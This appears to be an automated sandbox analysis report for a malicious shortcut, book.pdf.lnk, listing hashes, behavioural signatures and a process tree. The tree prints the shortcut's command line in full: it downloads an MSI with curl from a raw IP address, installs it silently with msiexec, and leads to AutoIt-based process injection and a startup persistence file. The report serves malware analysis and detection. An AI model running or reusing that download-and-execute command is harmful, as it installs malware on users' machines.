Resubmissions
24-08-2023 17:35
230824-v568qafh4y 323-08-2023 19:18
230823-xz2gdsfa82 323-08-2023 19:16
230823-xy925sfa76 321-08-2023 09:54
230821-lw62xscb47 1021-08-2023 00:59
230821-bb4qysaa78 10Analysis
-
max time kernel
149s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
21-08-2023 00:59
Static task
static1
Behavioral task
behavioral1
Sample
book.pdf.lnk
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
book.pdf.lnk
Resource
win10v2004-20230703-en
General
-
Target
book.pdf.lnk
-
Size
1KB
-
MD5
0185e0fc2f505312001e1a65e6783908
-
SHA1
8e4cf0397ba32d233a515a5aca02751f6f9344c6
-
SHA256
8b3162141ac545fa0ae63777748973b8ee88bb8234a917d5fb3238d2c2ca963d
-
SHA512
1a484bb08401fd7476d37029fa753aa82af10aa702f30fa30568ff7eaf94b484e604bbff9f6b5a67179a7d708cf61bb767fa974e0a9f35e751d74d9a2dd4fefc
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 53 IoCs
Processes:
Autoit3.execmd.exedescription pid process target process PID 4800 created 5032 4800 Autoit3.exe msiexec.exe PID 4800 created 2672 4800 Autoit3.exe svchost.exe PID 4800 created 3396 4800 Autoit3.exe Conhost.exe PID 4800 created 3516 4800 Autoit3.exe DllHost.exe PID 4800 created 3724 4800 Autoit3.exe RuntimeBroker.exe PID 4800 created 3396 4800 Autoit3.exe Conhost.exe PID 4800 created 2632 4800 Autoit3.exe sihost.exe PID 4800 created 3612 4800 Autoit3.exe StartMenuExperienceHost.exe PID 4800 created 2672 4800 Autoit3.exe svchost.exe PID 4800 created 64 4800 Autoit3.exe AcroRd32.exe PID 4800 created 3612 4800 Autoit3.exe StartMenuExperienceHost.exe PID 4800 created 2672 4800 Autoit3.exe svchost.exe PID 4800 created 2672 4800 Autoit3.exe svchost.exe PID 4800 created 1176 4800 Autoit3.exe TextInputHost.exe PID 4800 created 3848 4800 Autoit3.exe SearchApp.exe PID 4800 created 2672 4800 Autoit3.exe svchost.exe PID 5520 created 3848 5520 cmd.exe SearchApp.exe PID 5520 created 1632 5520 cmd.exe Eula.exe PID 5520 created 1632 5520 cmd.exe Eula.exe PID 5520 created 1632 5520 cmd.exe Eula.exe PID 5520 created 2632 5520 cmd.exe sihost.exe PID 5520 created 1632 5520 cmd.exe Eula.exe PID 5520 created 3848 5520 cmd.exe SearchApp.exe PID 5520 created 2632 5520 cmd.exe sihost.exe PID 5520 created 64 5520 cmd.exe AcroRd32.exe PID 5520 created 3848 5520 cmd.exe SearchApp.exe PID 5520 created 1176 5520 cmd.exe TextInputHost.exe PID 5520 created 4544 5520 cmd.exe RdrCEF.exe PID 5520 created 2596 5520 cmd.exe 32BitMAPIBroker.exe PID 5520 created 2672 5520 cmd.exe svchost.exe PID 5520 created 2672 5520 cmd.exe svchost.exe PID 5520 created 2596 5520 cmd.exe 32BitMAPIBroker.exe PID 5520 created 64 5520 cmd.exe AcroRd32.exe PID 5520 created 2812 5520 cmd.exe taskhostw.exe PID 5520 created 4544 5520 cmd.exe RdrCEF.exe PID 5520 created 2596 5520 cmd.exe 32BitMAPIBroker.exe PID 5520 created 2632 5520 cmd.exe sihost.exe PID 5520 created 1176 5520 cmd.exe TextInputHost.exe PID 5520 created 3848 5520 cmd.exe SearchApp.exe PID 5520 created 3612 5520 cmd.exe StartMenuExperienceHost.exe PID 5520 created 1632 5520 cmd.exe Eula.exe PID 5520 created 64 5520 cmd.exe AcroRd32.exe PID 5520 created 4544 5520 cmd.exe RdrCEF.exe PID 5520 created 3612 5520 cmd.exe StartMenuExperienceHost.exe PID 5520 created 2812 5520 cmd.exe taskhostw.exe PID 5520 created 2596 5520 cmd.exe 32BitMAPIBroker.exe PID 5520 created 2812 5520 cmd.exe taskhostw.exe PID 5520 created 2672 5520 cmd.exe svchost.exe PID 5520 created 2812 5520 cmd.exe taskhostw.exe PID 5520 created 2632 5520 cmd.exe sihost.exe PID 5520 created 2596 5520 cmd.exe 32BitMAPIBroker.exe PID 5520 created 3612 5520 cmd.exe StartMenuExperienceHost.exe PID 5520 created 2672 5520 cmd.exe svchost.exe -
Blocklisted process makes network request 31 IoCs
Processes:
cmd.exeflow pid process 20 5520 cmd.exe 21 5520 cmd.exe 22 5520 cmd.exe 40 5520 cmd.exe 41 5520 cmd.exe 42 5520 cmd.exe 43 5520 cmd.exe 44 5520 cmd.exe 45 5520 cmd.exe 46 5520 cmd.exe 47 5520 cmd.exe 50 5520 cmd.exe 51 5520 cmd.exe 52 5520 cmd.exe 53 5520 cmd.exe 54 5520 cmd.exe 57 5520 cmd.exe 60 5520 cmd.exe 61 5520 cmd.exe 62 5520 cmd.exe 63 5520 cmd.exe 64 5520 cmd.exe 65 5520 cmd.exe 66 5520 cmd.exe 67 5520 cmd.exe 68 5520 cmd.exe 69 5520 cmd.exe 70 5520 cmd.exe 72 5520 cmd.exe 76 5520 cmd.exe 77 5520 cmd.exe -
Drops startup file 1 IoCs
Processes:
cmd.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aaakdee.lnk cmd.exe -
Executes dropped EXE 1 IoCs
Processes:
Autoit3.exepid process 4800 Autoit3.exe -
Loads dropped DLL 2 IoCs
Processes:
MsiExec.exepid process 3248 MsiExec.exe 3248 MsiExec.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
ICACLS.EXEICACLS.EXEpid process 4280 ICACLS.EXE 5568 ICACLS.EXE -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exedescription ioc process File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\K: msiexec.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Autoit3.exedescription pid process target process PID 4800 set thread context of 5520 4800 Autoit3.exe cmd.exe -
Drops file in Windows directory 11 IoCs
Processes:
msiexec.exeEXPAND.EXEdescription ioc process File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\LOGS\DPX\setupact.log EXPAND.EXE File opened for modification C:\Windows\Installer\MSIF435.tmp msiexec.exe File opened for modification C:\Windows\Installer\e57aaf5.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\SourceHash{2E7A2CE6-9953-4AB8-AF77-A6C7F8260AA4} msiexec.exe File opened for modification C:\Windows\LOGS\DPX\setuperr.log EXPAND.EXE File opened for modification C:\Windows\Installer\MSIF425.tmp msiexec.exe File created C:\Windows\Installer\e57aaf5.msi msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIAF5A.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
AcroRd32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
Processes:
Autoit3.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings Autoit3.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msiexec.exeAutoit3.execmd.exepid process 4304 msiexec.exe 4304 msiexec.exe 4800 Autoit3.exe 4800 Autoit3.exe 4800 Autoit3.exe 4800 Autoit3.exe 4800 Autoit3.exe 4800 Autoit3.exe 4800 Autoit3.exe 4800 Autoit3.exe 4800 Autoit3.exe 4800 Autoit3.exe 4800 Autoit3.exe 4800 Autoit3.exe 4800 Autoit3.exe 4800 Autoit3.exe 4800 Autoit3.exe 4800 Autoit3.exe 4800 Autoit3.exe 4800 Autoit3.exe 4800 Autoit3.exe 4800 Autoit3.exe 4800 Autoit3.exe 4800 Autoit3.exe 4800 Autoit3.exe 4800 Autoit3.exe 4800 Autoit3.exe 4800 Autoit3.exe 4800 Autoit3.exe 4800 Autoit3.exe 4800 Autoit3.exe 4800 Autoit3.exe 4800 Autoit3.exe 4800 Autoit3.exe 4800 Autoit3.exe 4800 Autoit3.exe 5520 cmd.exe 5520 cmd.exe 5520 cmd.exe 5520 cmd.exe 5520 cmd.exe 5520 cmd.exe 5520 cmd.exe 5520 cmd.exe 5520 cmd.exe 5520 cmd.exe 5520 cmd.exe 5520 cmd.exe 5520 cmd.exe 5520 cmd.exe 5520 cmd.exe 5520 cmd.exe 5520 cmd.exe 5520 cmd.exe 5520 cmd.exe 5520 cmd.exe 5520 cmd.exe 5520 cmd.exe 5520 cmd.exe 5520 cmd.exe 5520 cmd.exe 5520 cmd.exe 5520 cmd.exe 5520 cmd.exe -
Suspicious use of AdjustPrivilegeToken 40 IoCs
Processes:
msiexec.exemsiexec.exedescription pid process Token: SeShutdownPrivilege 5032 msiexec.exe Token: SeIncreaseQuotaPrivilege 5032 msiexec.exe Token: SeSecurityPrivilege 4304 msiexec.exe Token: SeCreateTokenPrivilege 5032 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 5032 msiexec.exe Token: SeLockMemoryPrivilege 5032 msiexec.exe Token: SeIncreaseQuotaPrivilege 5032 msiexec.exe Token: SeMachineAccountPrivilege 5032 msiexec.exe Token: SeTcbPrivilege 5032 msiexec.exe Token: SeSecurityPrivilege 5032 msiexec.exe Token: SeTakeOwnershipPrivilege 5032 msiexec.exe Token: SeLoadDriverPrivilege 5032 msiexec.exe Token: SeSystemProfilePrivilege 5032 msiexec.exe Token: SeSystemtimePrivilege 5032 msiexec.exe Token: SeProfSingleProcessPrivilege 5032 msiexec.exe Token: SeIncBasePriorityPrivilege 5032 msiexec.exe Token: SeCreatePagefilePrivilege 5032 msiexec.exe Token: SeCreatePermanentPrivilege 5032 msiexec.exe Token: SeBackupPrivilege 5032 msiexec.exe Token: SeRestorePrivilege 5032 msiexec.exe Token: SeShutdownPrivilege 5032 msiexec.exe Token: SeDebugPrivilege 5032 msiexec.exe Token: SeAuditPrivilege 5032 msiexec.exe Token: SeSystemEnvironmentPrivilege 5032 msiexec.exe Token: SeChangeNotifyPrivilege 5032 msiexec.exe Token: SeRemoteShutdownPrivilege 5032 msiexec.exe Token: SeUndockPrivilege 5032 msiexec.exe Token: SeSyncAgentPrivilege 5032 msiexec.exe Token: SeEnableDelegationPrivilege 5032 msiexec.exe Token: SeManageVolumePrivilege 5032 msiexec.exe Token: SeImpersonatePrivilege 5032 msiexec.exe Token: SeCreateGlobalPrivilege 5032 msiexec.exe Token: SeRestorePrivilege 4304 msiexec.exe Token: SeTakeOwnershipPrivilege 4304 msiexec.exe Token: SeRestorePrivilege 4304 msiexec.exe Token: SeTakeOwnershipPrivilege 4304 msiexec.exe Token: SeRestorePrivilege 4304 msiexec.exe Token: SeTakeOwnershipPrivilege 4304 msiexec.exe Token: SeRestorePrivilege 4304 msiexec.exe Token: SeTakeOwnershipPrivilege 4304 msiexec.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
AcroRd32.exepid process 64 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
AcroRd32.exepid process 64 AcroRd32.exe 64 AcroRd32.exe 64 AcroRd32.exe 64 AcroRd32.exe 64 AcroRd32.exe 64 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.execmd.exemsiexec.exeMsiExec.exeAutoit3.exedescription pid process target process PID 2568 wrote to memory of 4640 2568 cmd.exe cmd.exe PID 2568 wrote to memory of 4640 2568 cmd.exe cmd.exe PID 4640 wrote to memory of 4196 4640 cmd.exe curl.exe PID 4640 wrote to memory of 4196 4640 cmd.exe curl.exe PID 4640 wrote to memory of 5032 4640 cmd.exe msiexec.exe PID 4640 wrote to memory of 5032 4640 cmd.exe msiexec.exe PID 4304 wrote to memory of 3248 4304 msiexec.exe MsiExec.exe PID 4304 wrote to memory of 3248 4304 msiexec.exe MsiExec.exe PID 4304 wrote to memory of 3248 4304 msiexec.exe MsiExec.exe PID 3248 wrote to memory of 4280 3248 MsiExec.exe ICACLS.EXE PID 3248 wrote to memory of 4280 3248 MsiExec.exe ICACLS.EXE PID 3248 wrote to memory of 4280 3248 MsiExec.exe ICACLS.EXE PID 3248 wrote to memory of 1752 3248 MsiExec.exe EXPAND.EXE PID 3248 wrote to memory of 1752 3248 MsiExec.exe EXPAND.EXE PID 3248 wrote to memory of 1752 3248 MsiExec.exe EXPAND.EXE PID 3248 wrote to memory of 4800 3248 MsiExec.exe Autoit3.exe PID 3248 wrote to memory of 4800 3248 MsiExec.exe Autoit3.exe PID 3248 wrote to memory of 4800 3248 MsiExec.exe Autoit3.exe PID 4800 wrote to memory of 64 4800 Autoit3.exe AcroRd32.exe PID 4800 wrote to memory of 64 4800 Autoit3.exe AcroRd32.exe PID 4800 wrote to memory of 64 4800 Autoit3.exe AcroRd32.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe PID 4800 wrote to memory of 1632 4800 Autoit3.exe Eula.exe
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2672
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe"2⤵PID:1632
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe"2⤵PID:2596
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe"2⤵PID:5280
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3516
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3724
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:3612
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca1⤵PID:1176
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:3848
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵PID:2812
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2632
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\book.pdf.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:3396
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c echo %cd% > C:\Users\Admin\AppData\Local\Temp\ruta.txt & echo eGz & echo zv & echo GMp & echo RC & curl -o C:\Users\Admin\AppData\Local\Temp\ffbjzugu.msi http://107.181.161.200:443/msiffbjzugu & msiexec /i C:\Users\Admin\AppData\Local\Temp\ffbjzugu.msi /quiet /qn2⤵
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Windows\system32\curl.execurl -o C:\Users\Admin\AppData\Local\Temp\ffbjzugu.msi http://107.181.161.200:443/msiffbjzugu3⤵PID:4196
-
C:\Windows\system32\msiexec.exemsiexec /i C:\Users\Admin\AppData\Local\Temp\ffbjzugu.msi /quiet /qn3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5032
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4304 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 3D1F5AF493D17AD18133CC9875D315A02⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3248 -
C:\Windows\SysWOW64\ICACLS.EXE"C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-75ffe91d-3557-4b15-8419-19551a5c5c68\." /SETINTEGRITYLEVEL (CI)(OI)HIGH3⤵
- Modifies file permissions
PID:4280 -
C:\Windows\SysWOW64\EXPAND.EXE"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files3⤵
- Drops file in Windows directory
PID:1752 -
C:\Users\Admin\AppData\Local\Temp\MW-75ffe91d-3557-4b15-8419-19551a5c5c68\files\Autoit3.exe"C:\Users\Admin\AppData\Local\Temp\MW-75ffe91d-3557-4b15-8419-19551a5c5c68\files\Autoit3.exe" bybq3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4800 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\book.pdf"4⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:64 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140435⤵PID:4544
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=EE8014EC8F06AAB485009F15A014CE80 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=EE8014EC8F06AAB485009F15A014CE80 --renderer-client-id=2 --mojo-platform-channel-handle=1760 --allow-no-sandbox-job /prefetch:16⤵PID:208
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E37CD281A5F3407371DD3932614650F0 --mojo-platform-channel-handle=1812 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵PID:1696
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=E88A341BF0729EC038B7117FF54092A8 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=E88A341BF0729EC038B7117FF54092A8 --renderer-client-id=4 --mojo-platform-channel-handle=2328 --allow-no-sandbox-job /prefetch:16⤵PID:4352
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=EF2C2437D54B4A0B5A83F86BD491C2E4 --mojo-platform-channel-handle=2360 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵PID:3216
-
